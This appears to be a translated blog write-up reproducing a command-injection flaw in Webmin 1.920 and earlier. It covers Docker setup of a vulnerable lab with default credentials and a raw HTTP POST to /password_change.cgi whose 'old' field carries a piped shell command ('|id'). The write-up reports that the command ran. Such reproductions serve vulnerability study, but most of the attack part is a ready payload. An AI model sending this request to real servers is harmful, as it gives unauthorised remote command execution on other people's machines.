0x00 Foreword
Originally a while ago wanted to reproduce with, but the version of the official website has been updated, until today only to find on the environment Docker, it has been reproduced
0x01 Affects Version
Webmin<=1.920
0x02 environment to build
docker search webmin
docker pull piersonjarvis/webmin-samba
docker run -d -p 10000:80 piersonjarvis/webmin-samba
Access your ip: 10000 to access the 1.920 version of webmin
Use account password: root / Webmin to log in to the background
Open the password reset feature:
Webmin--Webmin confuration--Authentication
0x03 exploits
After a long search, the interface to change the password is not found, so just grab a bag manually construct a data package as follows:
POST /password_change.cgi HTTP/1.1 Host: 136.244.xx.xx:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1 X-PJAX: true X-PJAX-Container: [data-dcontainer] X-PJAX-URL: passwd/edit_passwd.cgi?user=root X-Requested-From: passwd X-Requested-From-Tab: webmin X-Requested-With: XMLHttpRequest Content-Type: text/plain;charset=UTF-8 Content-Length: 49DNT: 1 Connection: close user=laemon&old=123123|id&new1=123456&new2=123456
The final execute command success
Reference article:
https://paper.seebug.org/1019/
More recent reproduce content, please pay attention to the public No. Timeline Sec